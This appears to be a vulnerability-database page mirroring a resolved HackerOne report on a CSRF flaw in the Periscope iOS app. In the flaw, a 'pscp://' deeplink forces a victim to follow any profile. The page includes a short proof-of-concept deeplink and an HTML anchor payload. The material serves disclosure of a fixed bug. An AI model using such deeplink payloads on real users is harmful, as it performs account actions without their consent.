Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Periscope iOS app CSRF in follow action due to deeplink

Low
X
X (Formerly Twitter)
Submitted None
Actions:
View on HackerOne
Reported by mgf15

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Summary This issue is mainly in the Periscope iOS app against CSRF follow action using deeplink. as the report #583987 the CSRF work on iOS app POC 1 QR code to follow periscope profile `pscp://user/periscopeco/follow ` ███████ POC2 by kunal94 ``` <!DOCTYPE html> <html> <a href="pscp://user/<any user-id>/follow">CSRF DEMO</a> </html> ``` video █████████ ## Impact CSRF Follow against any user in periscope iOS app

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$2940.00

Submitted

Weakness

Cross-Site Request Forgery (CSRF)